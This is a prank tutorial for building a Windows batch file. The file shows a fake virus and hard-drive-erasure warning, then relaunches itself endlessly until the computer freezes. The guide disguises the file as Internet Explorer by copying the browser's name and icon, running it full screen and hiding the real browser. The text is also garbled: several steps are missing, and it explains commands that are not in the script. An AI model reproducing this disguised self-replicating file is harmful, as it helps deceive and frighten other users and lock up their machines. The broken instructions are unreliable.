Step 1: Writing the Batch File
2) In your text document cut and paste this:
echo WARNING VIRUS HAS BEEN DETECTED
echo System check
echo Power - FAILED
echo RAM - FAILED
echo Norton - FAILED
echo Breach of IP adress
echo Firewall - FAILED
echo Virus attaining: ****-****-****-8894
echo Hard drive must be erased and rebooted to resume windows.
echo Starting to reboot hardrive.
echo Do not attempt to quit.
echo Restart after 10 minutes approximately.
start Internet Explorer.bat
3) Now click "File" then "Save as..." then save it as "Internet Explorer.BAT" onto the Desktop
I will explain to you what each of these symbols mean.
@echo off : This tells the file to hide what its doing and display what we tell it to.
echo : This tells the file to display something. It displays whatever you write after it.
PAUSE : This is what makes that sign come up that says "Press any key to continue" which literally pauses the file.
GOTO START : This tells the computer to run the file over and over and over again without stopping which causes the computer to freeze since it gets opened so much.
Step 2: Creating a Shortcut
5) Once it is in "My Documents" right click it and click "Create Shortcut"
Step 3: Saving, Changing, and Executing
7) This will open up a window. At the top of this window are tabs. Click on the "Shortcut" tab.
8) Now click on at the bottom of the window a button that says "Change Icon"
9) This will open another window. Scroll all the way to your left to find a picture that closely resembles the Internet Explorer icon. Click it and press "OK"
10) Now with the property window still up click on the "Options" tab. In this tab you will find a section that says "Display Options". Now click the circle labeled "Full screen".
11) At the bottom of the "Properties" window click "Apply".
12) Now move your file to the desktop and edit it to delete the "shortcut to" on the name of the file. After that take the current Internet Explorer and move it to "My Documents". If a warning label shows click yes.
P.S. To "deactivate" it just restart the computer. Mind you every time you click it you will have to restart it again so delete it after your first use. P.S.
Footnote: If you can't find the original Internet Explorer you can replace it by going into program files and dragging it to the desktop